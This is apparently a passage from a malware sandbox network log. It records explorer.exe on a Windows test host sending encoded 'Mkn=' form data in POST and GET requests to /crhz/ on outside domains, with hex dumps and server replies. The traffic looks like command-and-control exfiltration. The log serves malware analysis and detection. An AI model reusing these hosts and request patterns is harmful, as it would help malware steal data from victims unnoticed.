52 35 51 55 67 2d 77 56 71 54 50 42 50 78 59 79 49 66 6c 45 75 6e 4a 4d 64 49 72 5a 6c 78 68 31 4b 54 6d 58 46 69 5a 55 48 76 4b 6f 67 63 70 6b 55 54 28 48 71 53 52 6b 70 6b 50 4e 58 57 6c 4c 66 39 70 47 4c 6c 30 42 59 32 72 5a 69 69 41 61 39 34 66 6b 57 50 62 61 53 4b 7a 41 69 6e 47 61 52 76 34 62 46 64 6b 4e 4e 6e 7a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSKzAinGaRv4bFdkNNnzA).
Jan 25, 2023 13:22:08.307883978 CET	162	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 25 Jan 2023 12:22:08 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49706	164.88.201.214	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:10.812534094 CET	168	OUT	POST /crhz/ HTTP/1.1 Host: www.sandpiper-apts.com Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.sandpiper-apts.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.sandpiper-apts.com/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 47 50 76 34 42 78 75 39 6b 78 61 45 6a 70 65 4b 71 71 54 72 4c 46 41 30 6d 79 4c 57 7e 7a 36 4a 42 30 6f 46 43 55 7a 76 50 56 53 57 67 6e 78 78 74 2d 71 62 69 35 33 30 4f 4a 62 4d 46 6e 69 70 71 5a 71 4e 54 33 74 50 51 57 4d 2d 32 42 43 54 47 42 50 32 55 79 49 53 72 6b 75 6d 4e 4d 64 49 72 5a 70 6c 68 30 4b 70 6d 57 74 69 5a 68 54 76 4b 71 49 54 6f 30 55 53 7a 6e 71 53 52 6b 73 6b 50 4e 58 38 6c 4c 48 55 70 48 72 6c 32 54 51 32 74 49 69 74 4a 71 39 7a 63 6b 58 69 61 5f 50 30 6c 42 79 6e 56 34 78 66 7e 37 38 7a 6d 35 67 35 75 70 36 4b 6d 6f 59 74 52 76 75 52 46 70 66 41 77 75 68 65 43 34 70 31 42 59 42 57 54 67 62 6e 31 64 53 53 51 42 47 75 48 41 54 34 46 36 48 68 44 5f 4e 32 33 4b 56 6b 4b 46 7a 4e 44 31 47 2d 6a 38 7e 46 56 65 52 78 52 36 53 50 43 35 35 4a 45 34 4c 65 53 31 6a 68 63 58 59 6a 50 69 79 57 54 68 4a 4a 50 76 50 7a 48 50 42 5a 4e 2d 61 6d 78 4d 75 59 61 76 68 52 56 48 6e 62 4e 6f 37 5a 71 45 6b 44 58 30 7a 4f 75 54 35 6f 69 45 31 7a 6d 7a 39 33 33 4a 6e 7a 50 31 47 6d 6d 48 41 70 4d 52 36 52 39 64 41 50 28 49 47 73 65 67 6f 71 75 36 32 41 57 6c 45 6b 77 46 76 6c 46 69 72 51 31 7a 75 48 71 6b 6c 66 75 68 4c 71 7a 42 49 54 42 69 73 62 31 42 50 55 51 55 41 6a 46 7a 5a 62 39 69 34 4c 46 70 57 6e 46 47 37 75 6f 38 6a 4a 64 36 6c 65 50 63 56 79 51 79 54 44 44 75 5a 39 45 55 4f 6d 62 44 59 38 36 6d 34 61 6b 64 28 34 61 37 61 62 42 5f 71 55 79 58 30 4d 72 39 38 42 4d 6a 47 74 73 4c 47 38 6a 73 39 43 76 35 34 68 76 75 70 44 4a 58 50 41 70 4a 32 62 44 6a 69 44 53 39 6b 59 54 61 32 5f 6c 73 55 4e 57 33 63 74 33 71 49 62 62 63 62 69 64 41 71 44 28 51 38 73 35 35 4c 4a 75 44 47 68 65 74 49 6d 75 67 55 68 49 77 34 33 42 30 64 6c 36 6d 53 30 6c 44 55 62 4f 31 67 77 70 6c 66 6d 52 4b 33 54 75 6b 65 72 36 55 62 4d 6c 31 79 31 71 56 53 73 38 30 65 66 46 7a 5a 74 45 31 4b 72 36 34 77 71 6c 61 6e 44 4b 63 51 76 58 78 72 56 4d 48 48 6c 77 48 66 54 56 6a 38 6d 72 55 53 53 45 63 67 4d 42 66 62 71 77 56 6b 39 6f 59 7a 67 68 38 30 42 33 44 72 65 53 4e 39 36 7a 53 55 71 54 61 69 31 7a 5f 55 56 6c 71 38 56 4d 51 57 50 54 73 4a 6e 32 6e 65 70 68 39 51 50 5a 42 30 54 54 4d 68 42 32 5a 71 43 61 6e 5a 54 74 47 4c 58 7e 74 35 79 42 56 6c 6e 77 66 31 33 47 2d 52 79 56 54 4a 78 6c 6a 58 75 70 34 6a 52 61 73 74 46 5a 41 79 71 61 55 34 46 69 33 58 58 41 37 47 45 79 57 44 34 51 6d 45 7a 56 74 47 47 7e 30 30 42 51 42 65 7a 68 51 52 5a 39 6d 76 4f 61 46 7a 57 66 65 7e 4f 67 72 30 57 58 61 37 44 28 50 63 64 36 64 65 5f 53 6f 76 44 6e 36 79 5f 47 68 32 65 71 63 59 78 44 6e 79 68 4c 53 4b 31 78 5a 6f 6f 36 77 77 43 72 72 38 34 4d 76 4c 75 39 65 6d 66 66 38 4d 6e 33 6c 36 42 39 66 52 74 7a 54 54 79 59 36 50 73 48 78 42 66 78 51 75 4f 31 58 78 4d 36 41 42 38 6d 70 30 54 7a 77 4b 71 63 5a 32 50 6f 61 58 58 44 6d 34 53 31 74 64 72 75 50 31 2d 57 43 32 42 7a 69 43 4f 7e 6d 6b 78 53 38 69 74 4d 44 72 34 58 51 6f 44 6c 32 74 46 77 79 68 48 46 35 78 6f 55 47 7e 6d 66 38 58 74 6b 4e 34 33 50 4c 5a 38 62 38 36 4e 55 4d 74 55 69 68 46 45 72 5a 58 78 39 35 41 6b 68 50 33 57 33 6a 43 73 56 37 37 48 69 36 66 41 39 4f 6b 63 4f 4d 43 51 70 4a 58 65 6b 67 4e 4b 4e 4c 6e 36 61 37 52 37 65 53 4a 6e 47 6c 57 7a 6c 47 68 66 72 58 4b 48 45 76 5a 34 77 6a 66 6a 68 49 76 39 4a 54 31 47 78 5f 76 41 6a 54 72 52 6f 7a 71 78 48 30 63 42 6f 5a 37 46 38 39 6f 5a 63 43 36 32 62 30 71 64 54 45 79 51 53 7a 76 77 78 70 67 7a 6a 70 52 36 4e 68 44 35 43 72 53 4c 38 58 62 76 41 41 65 38 41 73 71 70 43 45 7e 5f 4e 36 6c 45 46 4e 45 41 28 50 7e 68 4b 79 54 6e 44 45 7e 30 31 34 79 36 36 42 70 6e 46 37 75 44 6e 76 47 68 4f 58 48 54 51 77 31 69 74 73 6c 6a 4e 52 53 41 42 6c 7e 70 51 79 44 5f 68 77 34 61 4c 70 31 42 56 65 78 70 64 79 6f 36 72 51 75 43 58 66 69 74 38 4d 35 6e 39 6d 31 6e 4d 4d 7a 77 6e 77 56 46 52 74 6b 58 70 47 75 73 74 67 67 67 64 74 6a 73 69 5a 77 66 39 51 49 42 43 69 36 65 5a 61 57 43 43 72 7a 52 75 55 30 59 56 46 56 59 66 34 55 33 34 4d 47 68 57 75 4a 5a 62 78 79 36 59 64 6b 34 51 35 34 4d 6c 6a 51 6d 62 6e 47 53 39 38 71 63 4f 4b 51 32 34 37 70 61 65 72 62 42 38 47 7e 35 71 68 42 54 35 34 6f 54 6b 53 54 32 5a 58 32 6f 64 4c 30 62 6e 63 6e 43 42 6e 76 Data Ascii: Mkn=GPv4Bxu9kxaEjpeKqqTrLFA0myLW~z6JB0oFCUzvPVSWgnxxt-qbi530OJbMFnipqZqNT3tPQWM-2BCTGBP2UyISrkumNMdIrZplh0KpmWtiZhTvKqITo0USznqSRkskPNX8lLHUpHrl2TQ2tIitJq9zckXia_P0lBynV4xf~78zm5g5up6KmoYtRvuRFpfAwuheC4p1BYBWTgbn1dSSQBGuHAT4F6HhD_N23KVkKFzND1G-j8~FVeRxR6SPC55JE4LeS1jhcXYjPiyWThJJPvPzHPBZN-amxMuYavhRVHnbNo7ZqEkDX0zOuT5oiE1zmz933JnzP1GmmHApMR6R9dAP(IGsegoqu62AWlEkwFvlFirQ1zuHqklfuhLqzBITBisb1BPUQUAjFzZb9i4LFpWnFG7uo8jJd6lePcVyQyTDDuZ9EUOmbDY86m4akd(4a7abB_qUyX0Mr98BMjGtsLG8js9Cv54hvupDJXPApJ2bDjiDS9kYTa2_lsUNW3ct3qIbbcbidAqD(Q8s55LJuDGhetImugUhIw43B0dl6mS0lDUbO1gwplfmRK3Tuker6UbMl1y1qVSs80efFzZtE1Kr64wqlanDKcQvXxrVMHHlwHfTVj8mrUSSEcgMBfbqwVk9oYzgh80B3DreSN96zSUqTai1z_UVlq8VMQWPTsJn2neph9QPZB0TTMhB2ZqCanZTtGLX~t5yBVlnwf13G-RyVTJxljXup4jRastFZAyqaU4Fi3XXA7GEyWD4QmEzVtGG~00BQBezhQRZ9mvOaFzWfe~Ogr0WXa7D(Pcd6de_SovDn6y_Gh2eqcYxDnyhLSK1xZoo6wwCrr84MvLu9emff8Mn3l6B9fRtzTTyY6PsHxBfxQuO1XxM6AB8mp0TzwKqcZ2PoaXXDm4S1tdruP1-WC2BziCO~mkxS8itMDr4XQoDl2tFwyhHF5xoUG~mf8XtkN43PLZ8b86NUMtUihFErZXx95AkhP3W3jCsV77Hi6fA9OkcOMCQpJXekgNKNLn6a7R7eSJnGlWzlGhfrXKHEvZ4wjfjhIv9JT1Gx_vAjTrRozqxH0cBoZ7F89oZcC62b0qdTEyQSzvwxpgzjpR6NhD5CrSL8XbvAAe8AsqpCE~_N6lEFNEA(P~hKyTnDE~014y66BpnF7uDnvGhOXHTQw1itsljNRSABl~pQyD_hw4aLp1BVexpdyo6rQuCXfit8M5n9m1nMMzwnwVFRtkXpGustgggdtjsiZwf9QIBCi6eZaWCCrzRuU0YVFVYf4U34MGhWuJZbxy6Ydk4Q54MljQmbnGS98qcOKQ247paerbB8G~5qhBT54oTkST2ZX2odL0bncnCBnvPgtXB2a1HbyX2Hh1OhQ6ZZ3vm58OYMfuIyskmTjRdS5AuqB~EialrlATNGWz5zid2C850b-zUsUySS57mnLT_v90sPYKCfRiUAplcFW7Kf6LPoYUYvclU8POPAXv4BIwU4WLW(ZH_XM7GC9cvLL0gxPrIi92W~5IG5dpY8dyCD5Mel4RqYQc_hq(SDQK8s5twmT(JrknpRdVV60RXI-7V50jYRVEsm4mkLBXEai2OFwMmNkot0dOqSiWio2SAweBDLDP2FUcsZBOXJrQVPOD_s3VG6r1doHM86nlpykOfY1YmlJiVnkr2A06B5hLNrdCEE6KbDQwhwHtYa0YvaJ(c2qSeDnmaxEoCQ6rSU1fEOePesOzcTWO7BHODrW2ZP6q32ya6GqamKRTsW815~i51uelZLXs1nqiktFUoShdwjmerlnUKWBZ44MY1v0VLo64WA2laRfl35NmhP9WX2ySOrj2wLgmDw6QZuG1KxR0xOuylt7KNdxw1o961js3ReXqmw_efWxx7GUP7EEdZ2fbXRGuf~JkKbu(M2ZLlO8o9VFZ1Hn7nvVAsH_czIlMxHr9UZTJTtOnOVetWqYsfgyCkRZYQtHwvnyE0xK4zMnlNb2Y6NC1tlVkmi5QncPmYRWXg6Q9s2IPk81fEeReWEsI5uMKk0QnWjEM-ROSgFt(0ZODjTTOKjc2euYJMM0~867z67sWW9s8WsNeKviClXoNOWRetI9fwdMzpZQ273Qhqp3mPH7WQPpcUXUHPwCEHGUiqAVumotEXZnLm5uCE8YOc~Dry9aoFBtnd8Fhhn91md7fhZfsqu6grKX7OhTCVKnw1sFR9sSg7EVBtQMSqszUGtgOLcneW6ArD2s3-~zH7ud8G(tTVRTqCyuFzBLaZB7UR905izeRBnul-tDT9FPmrAFi2DZPgD6KPbvyWKBRb4holnXoMivcFwALAaKC8fftaXTKUNGgwoHAsFu9RIKLv39sbTMiq2mA9NcDr6cylfj8YIp9UTT8yymACyaJFeQxeDk6rPgxQ7_ANiuuXvuf2hM(oBccj~YM1qfZLi_BofnMNZIwhsqX39n20dl62T4a9mCYxif59vpFEoB~F0mm1U5wP1JmK5utK9ufwYc4FX-gMj0sS0m2yy3i-OPEWVDytkEr-3YGYvao-CjYOvZqW5KAClbo-SYfvx4BsyWnTH4yXM48dHa7hrgXmxLb-jVkA2WLJB19rmrbHd3LypfYNFiYHaUj6hmFkvZWCKILX3VpjYLcLSEzdU17k5rnWpYpGjG5lkvSYlfN0fzBda-xv1WY4MvZDQ8wJ7RzFB1hUPMiphEZvVIzkbP4Bx6GAqvQkBKMvDdZ1iyntm5xDfKlkAURl4lLHk1um0_ipvbMPdlmOdj(oE3oikcfQbx99AirAaw7oj8hDdtmcMufJJFUc91ZyE49noab0XpttGvCx5YOVToKICtca6c8Mi0df7hOClSI4kvVJf7wHiyBTI-1KdrPtu7p99z6sxLNW7YnF32mkBbGcJZfzNDCyezg5ZGBh7pX-01KcWJ~TkAY1iKl3PIWJ3TnrDeFkiwVLMdEDVUWnxI~9JSzTZuLbf82MOa2JGoYbw6xNP-~-igmSVrr1~u4frpK4OvUG9r7U2YqF39v59R7_fKR9geLN070Cyw6q4ogauIRHxIVomvkXOXzjhatBlT6MyzBUcE5zfeSIa9u2dFn1pQX5nFUjznp28flPlWAH23VsB28pkdk8e4ESwEmMHxj8VvFIDx3bx5Ye9e3ex48Np8ldGUCw7v1z6jQGNjjVgGvNkiaRKZ6_HyA7ANSNfR4-Il2hIJXoFhi7~-OvBVb15hCILZrx0PTJDxpz(RurG1rPmr2Ioz~G(My5us8G7Csit3TA78U8HodtZdOBpoMdO_sWJyf2t0EgsINhgt2BLrcOPkGGInFgloNqs3ECsNjoZbftwI~_LUhIoiB6VwZUzUnIHF54m6RledUdakweChEl6KJ3b5DtlgIuRmWSTiiAGHK0keI8nWDhJ2GCN47Z0xFIe1qW5d7MOuU7KhR6BJkyCUCZ~tPwMTyhLXomy1R2AthZSHQIKHN_GchCdyXGxJuBAM9pVNNj1HajxWT_SdHMCNW1~LI5aru2PBx4kehuM9(pT-R1qobQsiezphLPulvyZ4FuW6ucr_WBAV9fR6LEJthxpIsy8X5cb6zlRAmPAXP2Y87az7gjWZVXJukJESnwQUhtfATEZZIH8PISkGwNM9gKcB0kqifKCcg8T9neYoQJb76L5MKAhnhpUBTMRkHaNlg41Wt3f_89HmOyd74mGSB690lVO9OF(0GalZ65w-XT0QaGeiJvJVpteLVm2OHYg3x8rEQAYo9whGohchz3QwNIi_vAJki5d-e42z4I86EvG1crP9T-FvhlkVkyKDyra2kTmc8HmEIqZGGF1wGtl3(6AzkbhXd8jNOgpK4Pgp~e5cMPmO~dqdT3Nxd98prXAZOKupL9bavYu26Xt5F2zAIFhlLb0GDbTIUbykTVLE6sxxXlIGG6(w7-2I1RDfY8TmRryJsSYCnZN_L0RZ4_KSxg14hJnZv4(duHIDQguI8pqs~6g79Ls1R2xdnMHPyJ54pKxjA9Zg5IzgouhzDSSdiq(hs6a60b7th8nJMtqu7BjL7cvFL7SnkIwPV3V89I4quBcsMGhVATMtj3h1nrcYYSn9809tnK~WP8R_Kyljreae
Jan 25, 2023 13:22:11.021210909 CET	168	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 25 Jan 2023 12:22:10 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49707	164.88.201.214	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:13.546900988 CET	169	OUT	GET /crhz/?Mkn=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTGHGtv/xv4Is4Luw==&vux=DmStydFUWc8HD HTTP/1.1 Host: www.sandpiper-apts.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 25, 2023 13:22:13.755505085 CET	170	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 25 Jan 2023 12:22:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49708	18.138.206.213	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:18.995636940 CET	171	OUT	POST /crhz/ HTTP/1.1 Host: www.tf8dangky.online Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.tf8dangky.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.tf8dangky.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 6f 57 74 51 5a 43 63 2d 67 70 42 7a 34 58 53 39 47 48 76 4f 65 65 62 4e 55 58 57 38 4d 49 31 50 6f 53 63 46 61 74 75 6e 6d 44 45 70 38 34 7a 6f 69 34 7e 6e 58 44 35 78 71 4e 69 51 72 71 56 51 30 49 4d 79 71 59 59 5f 48 74 28 36 39 39 52 64 33 58 68 30 70 6b 61 67 71 4e 7e 74 6e 38 78 5f 35 6f 68 7a 48 76 6b 58 71 6c 71 35 36 76 71 35 6e 33 31 71 74 75 78 70 4d 43 63 43 56 75 34 75 73 71 56 75 61 6d 46 36 28 45 4a 37 38 77 55 67 65 6e 74 35 6f 56 45 71 78 33 52 44 62 43 77 31 30 6b 30 41 4b 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=1ZNm~q7dG2WPoWtQZCc-gpBz4XS9GHvOeebNUXW8MI1PoScFatunmDEp84zoi4~nXD5xqNiQrqVQ0IMyqYY_Ht(699Rd3Xh0pkagqN~tn8x_5ohzHvkXqlq56vq5n31qtuxpMCcCVu4usqVuamF6(EJ78wUgent5oVEqx3RDbCw10k0AKQ).
Jan 25, 2023 13:22:19.202574015 CET	171	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 25 Jan 2023 12:22:19 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.tf8dangky.online/crhz/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49709	18.138.206.213	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 25, 2023 13:22:21.727606058 CET	177	OUT	POST /crhz/ HTTP/1.1 Host: www.tf8dangky.online Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.tf8dangky.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.tf8dangky.online/crhz/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4d 6b 6e 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 79 33 64 51 62 68 6b 2d 6f 70 42 38 30 33 53 39 4e 6e 76 4b 65 65 58 4e 55 57 53 73 50 36 35 50 6f 42 6b 46 55 75 47 6e 6b 44 45 70 7e 34 7a 6b 6d 34 7e 4c 58 44 39 31 71 4d 53 36 72 6f 35 51 31 61 30 79 36 6f 59 38 45 4e 7e 64 38 39 52 65 35 33 68 30 70 6b 58 63 71 4d 28 50 6e 38 4a 5f 35 62 70 7a 48 74 38 55 34 6c 71 36 79 50 71 35 6e 33 34 71 74 75 78 35 4d 47 30 53 56 75 59 75 76 5a 39 75 64 7a 70 39 32 30 4a 38 69 41 56 4b 4f 79 77 6e 38 47 34 4e 37 6c 70 42 59 6c 49 37 33 51 35 75 65 30 32 73 41 44 36 73 51 55 55 49 56 51 4b 6d 78 68 37 6b 69 6f 38 4e 53 31 4e 48 42 52 32 68 71 52 67 79 7a 71 31 31 4c 65 56 77 31 34 6a 6f 34 61 35 6b 5a 61 43 68 62 75 54 4c 6c 30 46 63 4c 46 35 55 78 57 63 63 43 4b 76 47 79 62 71 4c 4f 50 66 48 38 51 6f 36 55 53 77 31 66 78 4f 2d 79 47 39 33 4a 31 6e 58 68 73 53 4c 31 61 75 66 44 4b 35 45 42 68 28 2d 6c 50 77 51 33 6a 67 63 71 63 6b 51 58 6e 47 58 39 50 46 59 7a 49 4b 76 37 56 53 74 48 4d 34 6b 4c 61 52 79 73 56 65 4b 79 4a 72 64 32 6d 66 75 59 6d 35 75 56 48 6a 4e 46 72 6c 43 38 46 45 49 39 67 77 41 58 4f 4f 77 4a 6f 6d 33 42 69 68 5a 42 6a 4a 41 58 4d 6d 62 63 52 44 37 78 49 31 57 47 49 64 4e 61 36 36 51 76 68 73 58 61 2d 56 5a 66 5f 72 72 33 4f 6b 49 59 34 67 4a 74 41 30 4c 31 4f 49 33 62 61 42 30 78 78 38 4a 48 74 4c 75 73 4c 70 5f 76 66 41 44 6c 43 79 6a 47 70 6a 6d 78 48 7a 7a 7e 5a 38 33 4b 6d 6e 4a 49 6b 4b 62 69 37 46 51 74 65 5a 76 44 77 5a 47 49 4a 71 34 71 70 42 6c 57 6d 51 49 28 56 74 2d 6d 33 76 54 78 5a 68 50 76 63 48 4e 7a 4c 77 69 57 6d 47 36 4d 53 6d 5a 6b 36 6f 36 6e 48 68 73 36 31 73 4a 73 70 38 6b 5a 5f 4c 42 37 79 53 53 4c 65 31 43 6f 64 74 42 6b 62 32 4f 41 51 42 57 4a 37 28 4a 56 59 52 67 42 47 49 34 69 72 77 7a 59 76 43 66 38 57 6c 65 34 57 52 66 74 4d 75 54 4e 78 7a 59 55 43 57 4d 64 52 6f 48 77 4a 77 78 6e 33 76 31 56 36 7a 49 55 48 41 55 6a 62 4a 4d 36 77 48 71 45 34 33 58 6d 61 46 56 4b 46 6b 4c 67 39 66 73 7e 6f 50 38 6a 49 56 7a 36 46 53 51 77 36 58 2d 49 78 31 46 76 62 44 55 68 37 57 6f 47 45 5a 57 4f 32 47 54 37 4b 68 77 73 47 30 6d 47 67 46 77 4a 30 6a 4e 30 61 6b 54 33 6c 59 51 44 67 61 51 62 58 45 4e 75 41 72 4f 34 42 45 55 69 4e 37 4f 4e 6e 69 72 66 4e 46 6b 6f 41 79 67 6a 4c 45 78 28 44 76 73 57 5f 6f 61 49 51 73 51 32 49 41 47 4f 59 4b 77 50 72 50 52 4e 46 33 73 73 66 52 4b 57 36 44 72 39 4b 7e 49 61 74 6e 77 32 69 76 6c 35 4e 36 48 56 56 39 76 78 51 50 46 5a 4c 45 7a 6c 6e 46 5f 28 33 6b 32 4b 53 51 75 68 66 38 63 62 53 33 72 31 75 70 32 74 75 38 63 67 6f 50 48 30 66 74 44 4d 4d 44 74 48 41 63 4b 72 6e 49 65 28 4d 69 44 7e 64 51 4a 56 36 77 44 57 4b 6f 4b 69 79 7a 46 62 61 6c 6b 32 51 6f 65 4c 74 54 63 57 5a 66 65 4c 67 77 55 6f 63 47 37 42 6a 71 42 38 39 47 53 6f 64 68 31 71 58 45 79 6c 6b 71 34 32 48 4f 47 68 75 6b 6c 79 69 50 54 33 78 62 34 6c 56 56 39 52 76 50 67 34 57 75 42 6f 5a 43 64 34 4c 50 77 6e 72 47 4f 77 64 39 7a 36 35 6b 7a 7a 46 28 39 37 34 48 69 38 53 6c 73 43 6d 77 74 6c 39 39 61 44 68 34 33 4d 49 41 2d 4c 34 68 46 74 32 6a 69 50 50 4f 49 4a 38 68 71 36 57 49 31 48 6a 28 47 49 4a 36 69 38 5f 36 41 4f 62 7a 75 42 70 28 6b 59 73 64 50 69 37 43 7a 42 4e 34 42 64 44 49 30 6b 6c 70 67 54 4d 44 53 6c 5f 42 51 50 37 67 5f 4d 4b 46 33 34 46 78 4c 4e 57 4f 75 6c 30 53 63 6d 35 65 62 4d 61 36 70 37 77 6d 4c 73 77 45 6d 79 65 6e 4e 6d 5a 46 4b 57 35 74 7a 6c 79 49 4e 44 64 66 75 71 56 63 64 6f 4b 72 49 77 66 6d 58 64 65 75 67 78 32 67 5a 36 5a 7e 72 43 38 4c 49 6b 30 47 36 7e 34 4f 4f 28 4f 7a 4b 52 33 77 63 42 4f 54 43 69 74 35 36 58 37 6d 66 67 64 7e 63 4e 49 59 69 30 67 6e 76 54 64 64 72 6c 4e 43 4b 31 7a 33 63 67 6d 64 44 69 57 36 74 37 69 30 49 4a 78 74 39 4b 5a 45 4e 62 4a 61 42 73 4d 33 75 59 64 44 38 6e 63 6e 63 70 71 74 39 32 67 33 58 79 6f 51 6c 33 6c 45 64 57 38 6f 43 41 4a 4b 6c 6a 35 4c 37 39 47 30 41 39 58 45 6c 65 74 30 54 55 36 55 67 31 46 77 58 48 51 51 4b 74 5f 55 41 70 72 52 56 73 4e 4b 53 4b 79 56 55 6d 66 59 70 76 6c 67 46 72 39 4a 71 31 56 39 4a 6a 4e 4c 75 45 62 44 32 79 33 67 44 4a 75 7a 4d 48 54 78 69 4c 55 31 66 76 5a 64 34 36 4f 51 5a 56 53 7a 58 6f 34 48 Data Ascii: 